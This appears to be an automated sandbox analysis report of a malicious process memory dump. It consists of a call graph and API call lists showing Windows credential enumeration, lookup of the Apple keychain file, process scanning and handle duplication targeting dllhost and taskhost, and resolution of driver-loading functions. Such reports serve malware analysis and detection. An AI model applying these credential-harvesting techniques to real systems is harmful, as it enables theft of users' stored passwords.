40ae18 9 API calls 38934->38936 38940 445ef5 38936->38940 38937 4457c7 38937->38891 38939 4087b3 338 API calls 38937->38939 38938 40ae51 9 API calls 38938->38940 38939->38891 38940->38938 38941 445f5c 38940->38941 38943 40add4 2 API calls 38940->38943 38944 40b2cc 27 API calls 38940->38944 38945 409d1f 6 API calls 38940->38945 38947 445f3a 38940->38947 39346 409b98 GetFileAttributesW 38940->39346 38942 40aebe FindClose 38941->38942 38942->38901 38943->38940 38944->38940 38945->38940 39347 445093 23 API calls 38947->39347 38949->38751 38950->38753 38951->38751 38952->38746 38954 40c775 38953->38954 39349 40b1ab ??3@YAXPAX ??3@YAXPAX 38954->39349 38956 40c788 39350 40b1ab ??3@YAXPAX ??3@YAXPAX 38956->39350 38958 40c790 39351 40b1ab ??3@YAXPAX ??3@YAXPAX 38958->39351 38960 40c798 38961 40aa04 ??3@YAXPAX 38960->38961 
38962 40c7a0 38961->38962 39352 40c274 memset 38962->39352 38967 40a8ab 9 API calls 38968 40c7c3 38967->38968 38969 40a8ab 9 API calls 38968->38969 38970 40c7d0 38969->38970 39381 40c3c3 38970->39381 38974 40c877 38983 40bdb0 38974->38983 38975 40c86c 39423 4053fe 39 API calls 38975->39423 38981 40c7e5 38981->38974 38981->38975 38982 40c634 49 API calls 38981->38982 39406 40a706 38981->39406 38982->38981 39616 404363 38983->39616 38986 40bf5d 39636 40440c 38986->39636 38988 40bdee 38988->38986 38991 40b2cc 27 API calls 38988->38991 38989 40bddf CredEnumerateW 38989->38988 38992 40be02 wcslen 38991->38992 38992->38986 38999 40be1e 38992->38999 38993 40be26 _wcsncoll 38993->38999 38996 40be7d memset 38997 40bea7 memcpy 38996->38997 38996->38999 38998 40bf11 wcschr 38997->38998 38997->38999 38998->38999 38999->38986 38999->38993 38999->38996 38999->38997 38999->38998 39000 40b2cc 27 API calls 38999->39000 39002 40bf43 LocalFree 38999->39002 39639 40bd5d 28 API calls 38999->39639 39640 404423 38999->39640 39001 40bef6 _wcsnicmp 39000->39001 39001->38998 39001->38999 39002->38999 39003 4135f7 39653 4135e0 39003->39653 39006 40b2cc 27 API calls 39007 41360d 39006->39007 39037 40399d 39036->39037 39682 403a16 39037->39682 39040 403a12 wcsrchr 39040->38774 39043 4039a3 39044 4039f4 39043->39044 39046 403a09 39043->39046 39693 40a02c CreateFileW 39043->39693 39045 4099c6 2 API calls 39044->39045 39044->39046 39045->39046 39696 40b1ab ??3@YAXPAX ??3@YAXPAX 39046->39696 39048 414c2e 16 API calls 39047->39048 39049 404048 39048->39049 39050 414c2e 16 API calls 39049->39050 39051 404056 39050->39051 39052 409d1f 6 API calls 39051->39052 39053 404073 39052->39053 39054 409d1f 6 API calls 39053->39054 39055 40408e 39054->39055 39056 409d1f 6 API calls 39055->39056 39057 4040a6 39056->39057 39058 403af5 20 API calls 39057->39058 39059 4040ba 39058->39059 39060 403af5 20 API calls 39059->39060 39061 4040cb 39060->39061 39723 40414f memset 39061->39723 39063 404140 39737 40b1ab 
??3@YAXPAX ??3@YAXPAX 39063->39737 39064 4040ec memset 39068 4040e0 39064->39068 39066 404148 39066->38826 39067 4099c6 2 API calls 39067->39068 39068->39063 39068->39064 39068->39067 39069 40a8ab 9 API calls 39068->39069 39069->39068 39750 40a6e6 WideCharToMultiByte 39070->39750 39072 4087ed 39751 4095d9 memset 39072->39751 39122 40b633 ??3@YAXPAX 39121->39122 39123 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39122->39123 39124 413f00 Process32NextW 39123->39124 39125 413da5 OpenProcess 39124->39125 39126 413f17 CloseHandle 39124->39126 39127 413eb0 39125->39127 39128 413df3 memset 39125->39128 39126->38866 39127->39124 39130 413ebf ??3@YAXPAX 39127->39130 39131 4099f4 3 API calls 39127->39131 39989 413f27 39128->39989 39130->39127 39131->39127 39133 413e37 GetModuleHandleW 39134 413e46 GetProcAddress 39133->39134 39135 413e1f 39133->39135 39134->39135 39135->39133 39994 413959 39135->39994 40010 413ca4 39135->40010 39137 413ea2 CloseHandle 39137->39127 39139 414c2e 16 API calls 39138->39139 39140 403eb7 39139->39140 39141 414c2e 16 API calls 39140->39141 39142 403ec5 39141->39142 39143 409d1f 6 API calls 39142->39143 39144 403ee2 39143->39144 39145 409d1f 6 API calls 39144->39145 39146 403efd 39145->39146 39147 409d1f 6 API calls 39146->39147 39148 403f15 39147->39148 39149 403af5 20 API calls 39148->39149 39150 403f29 39149->39150 39151 403af5 20 API calls 39150->39151 39152 403f3a 39151->39152 39153 40414f 33 API calls 39152->39153 39159 403f4f 39153->39159 39154 403faf 40024 40b1ab ??3@YAXPAX ??3@YAXPAX 39154->40024 39156 403f5b memset 39156->39159 39157 403fb7 39157->38812 39158 4099c6 2 API calls 39158->39159 39159->39154 39159->39156 39159->39158 39160 40a8ab 9 API calls 39159->39160 39160->39159 39162 414c2e 16 API calls 39161->39162 39163 403d26 39162->39163 39164 414c2e 16 API calls 39163->39164 39165 403d34 39164->39165 39166 409d1f 6 API calls 39165->39166 39167 403d51 39166->39167 39168 409d1f 6 API calls 39167->39168 39169 403d6c 
39168->39169 39170 409d1f 6 API calls 39169->39170 39171 403d84 39170->39171 39172 403af5 20 API calls 39171->39172 39173 403d98 39172->39173 39174 403af5 20 API calls 39173->39174 39175 403da9 39174->39175 39176 40414f 33 API calls 39175->39176 39182 403dbe 39176->39182 39177 403e1e 40025 40b1ab ??3@YAXPAX ??3@YAXPAX 39177->40025 39178 403dca memset 39178->39182 39180 403e26 39180->38815 39181 4099c6 2 API calls 39181->39182 39182->39177 39182->39178 39182->39181 39183 40a8ab 9 API calls 39182->39183 39183->39182 39185 414b81 9 API calls 39184->39185 39186 414c40 39185->39186 39187 414c73 memset 39186->39187 40026 409cea 39186->40026 39190 414c94 39187->39190 39189 414c64 39189->38807 40029 414592 RegOpenKeyExW 39190->40029 39193 414cc1 39194 414cf4 wcscpy 39193->39194 40030 414bb0 wcscpy 39193->40030 39194->39189 39196 414cd2 40031 4145ac RegQueryValueExW 39196->40031 39198 414ce9 RegCloseKey 39198->39194 39200 409d62 39199->39200 39201 409d43 wcscpy 39199->39201 39200->38846 39202 409719 2 API calls 39201->39202 39203 409d51 wcscat 39202->39203 39203->39200 39205 40aebe FindClose 39204->39205 39206 40ae21 39205->39206 39207 4099c6 2 API calls 39206->39207 39208 40ae35 39207->39208 39209 409d1f 6 API calls 39208->39209 39210 40ae49 39209->39210 39210->38912 39212 40ade0 39211->39212 39213 40ae0f 39211->39213 39212->39213 39214 40ade7 wcscmp 39212->39214 39213->38912 39214->39213 39215 40adfe wcscmp 39214->39215 39215->39213 39217 40ae18 9 API calls 39216->39217 39223 4453c4 39217->39223 39218 40ae51 9 API calls 39218->39223 39219 4453f3 39220 40aebe FindClose 39219->39220 39222 4453fe 39220->39222 39221 40add4 2 API calls 39221->39223 39222->38912 39223->39218 39223->39219 39223->39221 39224 445403 253 API calls 39223->39224 39224->39223 39226 40ae7b FindNextFileW 39225->39226 39227 40ae5c FindFirstFileW 39225->39227 39228 40ae94 39226->39228 39229 40ae8f 39226->39229 39227->39228 39231 40aeb6 39228->39231 39232 409d1f 6 API calls 39228->39232 39230 40aebe 
38068->38070 38074 41f282 38068->38074 38069->38070 38071 41f21b memcmp 38070->38071 38070->38074 38072 41f326 38071->38072 38075 41f23d 38071->38075 38073 41ee6b 86 API calls 38072->38073 38072->38074 38073->38074 38074->37852 38075->38072 38076 41f28e memcmp 38075->38076 38118 41c8df 56 API calls 38075->38118 38076->38072 38077 41f2a9 38076->38077 38077->38072 38080 41f308 38077->38080 38081 41f2d8 38077->38081 38079 41f269 38079->38072 38082 41f287 38079->38082 38083 41f27a 38079->38083 38080->38072 38123 4446ce 11 API calls 38080->38123 38084 41ee6b 86 API calls 38081->38084 38082->38076 38085 41ee6b 86 API calls 38083->38085 38086 41f2e0 38084->38086 38085->38074 38119 41b1ca 38086->38119 38089->37852 38090->37852 38091->37852 38092->37848 38093->37849 38096 41bc54 38094->38096 38103 41be0b 38094->38103 38097 41bd61 38096->38097 38096->38103 38107 41bc8d 38096->38107 38124 41baf0 55 API calls 38096->38124 38099 41be45 38097->38099 38133 41a25f memset 38097->38133 38099->38067 38099->38074 38101 41be04 38131 41aee4 56 API calls 38101->38131 38103->38097 38132 41ae17 34 API calls 38103->38132 38104 41bd42 38104->38097 38104->38101 38105 41bdd8 memset 38104->38105 38106 41bdba 38104->38106 38108 41bde7 memcmp 38105->38108 38117 4175ed 6 API calls 38106->38117 38107->38097 38107->38104 38109 41bd18 38107->38109 38125 4151e3 38107->38125 38108->38101 38111 41bdfd 38108->38111 38109->38097 38109->38104 38129 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38109->38129 38110 41bdcc 38110->38097 38110->38108 38130 41a1b0 memset 38111->38130 38117->38110 38118->38079 38120 41b1e4 38119->38120 38122 41b243 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38120->38122 38183 41a1b0 memset 38120->38183 38122->38074 38123->38072 38124->38107 38134 41837f 38125->38134 38128 444706 11 API calls 38128->38109 38129->38104 38130->38101 38131->38103 38132->38097 38133->38099 38135 4183c1 38134->38135 38138 4183ca 38134->38138 38181 418197 25 API calls 38135->38181 
38139 4151f9 38138->38139 38155 418160 38138->38155 38139->38109 38139->38128 38140 4183e5 38140->38139 38164 41739b 38140->38164 38143 418444 CreateFileW 38145 418477 38143->38145 38144 41845f CreateFileA 38144->38145 38146 4184c2 memset 38145->38146 38147 41847e GetLastError ??3@YAXPAX 38145->38147 38167 418758 38146->38167 38148 4184b5 38147->38148 38149 418497 38147->38149 38182 444706 11 API calls 38148->38182 38151 41837f 49 API calls 38149->38151 38151->38139 38156 41739b GetVersionExW 38155->38156 38157 418165 38156->38157 38159 4173e4 MultiByteToWideChar malloc MultiByteToWideChar ??3@YAXPAX 38157->38159 38160 418178 38159->38160 38161 41817f 38160->38161 38162 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte ??3@YAXPAX 38160->38162 38161->38140 38163 418188 ??3@YAXPAX 38162->38163 38163->38140 38165 4173d6 38164->38165 38166 4173ad GetVersionExW 38164->38166 38165->38143 38165->38144 38166->38165 38168 418680 43 API calls 38167->38168 38169 418782 38168->38169 38170 418160 11 API calls 38169->38170 38172 418506 ??3@YAXPAX 38169->38172 38171 418799 38170->38171 38171->38172 38173 41739b GetVersionExW 38171->38173 38172->38139 38174 4187a7 38173->38174 38175 4187da 38174->38175 38176 4187ad GetDiskFreeSpaceW 38174->38176 38178 4187ec GetDiskFreeSpaceA 38175->38178 38180 4187e8 38175->38180 38179 418800 ??3@YAXPAX 38176->38179 38178->38179 38179->38172 38180->38178 38181->38138 38182->38139 38183->38122 38219 424f07 38184->38219 38186 4251e4 38187 4251f7 38186->38187 38188 4251e8 38186->38188 38227 4250f8 38187->38227 38226 4446ea 11 API calls 38188->38226 38190 4251f2 38190->37883 38192 425209 38195 425249 38192->38195 38198 4250f8 127 API calls 38192->38198 38199 425287 38192->38199 38235 4384e9 135 API calls 38192->38235 38236 424f74 124 API calls 38192->38236 38193 415c7d 16 API calls 38193->38190 38195->38199 38237 424ff0 13 API calls 38195->38237 38198->38192 38199->38193 38200 425266 38200->38199 38238 415be9 memcpy 38200->38238 
38202->37877 38203->37883 38204->37883 38205->37883 38206->37883 38207->37883 38208->37888 38209->37870 38211 4442eb 38210->38211 38214 444303 38210->38214 38291 41707a 11 API calls 38211->38291 38213 4442f2 38213->38214 38292 4446ea 11 API calls 38213->38292 38214->37876 38216 444300 38216->37876 38217->37886 38218->37895 38220 424f1f 38219->38220 38221 424f0c 38219->38221 38240 424eea 11 API calls 38220->38240 38239 416760 11 API calls 38221->38239 38224 424f18 38224->38186 38225 424f24 38225->38186 38226->38190 38228 425108 38227->38228 38234 42510d 38227->38234 38273 424f74 124 API calls 38228->38273 38231 42516e 38233 415c7d 16 API calls 38231->38233 38232 425115 38232->38192 38233->38232 38234->38232 38241 42569b 38234->38241 38235->38192 38236->38192 38237->38200 38238->38199 38239->38224 38240->38225 38252 4256f1 38241->38252 38269 4259c2 38241->38269 38242 429ac1 38268 425ad6 38242->38268 38290 415c56 11 API calls 38242->38290 38247 4260dd 38285 424251 120 API calls 38247->38285 38251 429a4d 38254 429a66 38251->38254 38255 429a9b 38251->38255 38252->38242 38252->38251 38253 422aeb memset memcpy memcpy 38252->38253 38257 4260a1 38252->38257 38266 4259da 38252->38266 38252->38269 38272 425a38 38252->38272 38274 4227f0 memset memcpy 38252->38274 38275 422b84 15 API calls 38252->38275 38276 422b5d memset memcpy memcpy 38252->38276 38277 422640 13 API calls 38252->38277 38279 4241fc 11 API calls 38252->38279 38280 42413a 90 API calls 38252->38280 38253->38252 38286 415c56 11 API calls 38254->38286 38259 429a96 38255->38259 38288 416760 11 API calls 38255->38288 38283 415c56 11 API calls 38257->38283 38289 424251 120 API calls 38259->38289 38262 429a7a 38287 416760 11 API calls 38262->38287 38284 416760 11 API calls 38266->38284 38268->38231 38269->38268 38278 415c56 11 API calls 38269->38278 38272->38269 38281 422640 13 API calls 38272->38281 38282 4226e0 12 API calls 38272->38282 38273->38234 38274->38252 38275->38252 38276->38252 38277->38252 38278->38266 
38279->38252 38280->38252 38281->38272 38282->38272 38283->38266 38284->38247 38285->38268 38286->38262 38287->38259 38288->38259 38289->38242 38290->38266 38291->38213 38292->38216 38293->37899 40171 4147f3 40174 414561 40171->40174 40173 414813 40175 41456d 40174->40175 40176 41457f GetPrivateProfileIntW 40174->40176 40179 4143f1 memset _itow WritePrivateProfileStringW 40175->40179 40176->40173 40178 41457a 40178->40173 40179->40178

                    Control-flow Graph
                    [basic-block edge list of the rendered graph not reproduced]
                    APIs
                    • memset.MSVCRT ref: 0040DDAD
                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                    • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                    • _wcsicmp.MSVCRT ref: 0040DEB2
                    • _wcsicmp.MSVCRT ref: 0040DEC5
                    • _wcsicmp.MSVCRT ref: 0040DED8
                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                    • memset.MSVCRT ref: 0040DF5F
                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                    • _wcsicmp.MSVCRT ref: 0040DFB2
                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                    • API String ID: 594330280-3398334509
                    • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                    • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                    Control-flow Graph
                    [basic-block edge list of the rendered graph not reproduced]
                    APIs
                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                    • memset.MSVCRT ref: 00413D7F
                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                    • memset.MSVCRT ref: 00413E07
                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                    • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                    • API String ID: 912665193-1740548384
                    • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                    • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                    • memcpy.MSVCRT ref: 0040B60D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                    • String ID: BIN
                    • API String ID: 1668488027-1015027815
                    • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                    • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                    APIs
                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                      • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                    • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                    • String ID:
                    • API String ID: 2947809556-0
                    • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                    • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                    APIs
                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileFind$FirstNext
                    • String ID:
                    • API String ID: 1690352074-0
                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                    APIs
                    • memset.MSVCRT ref: 0041898C
                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: InfoSystemmemset
                    • String ID:
                    • API String ID: 3558857096-0
                    • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                    • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                    Control-flow Graph
                    [basic-block edge list of the rendered graph not reproduced]
                    APIs
                    • memset.MSVCRT ref: 004455C2
                    • wcsrchr.MSVCRT ref: 004455DA
                    • memset.MSVCRT ref: 0044570D
                    • memset.MSVCRT ref: 00445725
                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                      • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                      • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                    • memset.MSVCRT ref: 0044573D
                    • memset.MSVCRT ref: 00445755
                    • memset.MSVCRT ref: 004458CB
                    • memset.MSVCRT ref: 004458E3
                    • memset.MSVCRT ref: 0044596E
                    • memset.MSVCRT ref: 00445A10
                    • memset.MSVCRT ref: 00445A28
                    • memset.MSVCRT ref: 00445AC6
                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                    • memset.MSVCRT ref: 00445B52
                    • memset.MSVCRT ref: 00445B6A
                    • memset.MSVCRT ref: 00445C9B
                    • memset.MSVCRT ref: 00445CB3
                    • _wcsicmp.MSVCRT ref: 00445D56
                    • memset.MSVCRT ref: 00445B82
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                    • memset.MSVCRT ref: 00445986
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                    • API String ID: 2745753283-3798722523
                    • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                    • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                    • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                    • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                    • String ID: $/deleteregkey$/savelangfile
                    • API String ID: 2744995895-28296030
                    • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                    • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
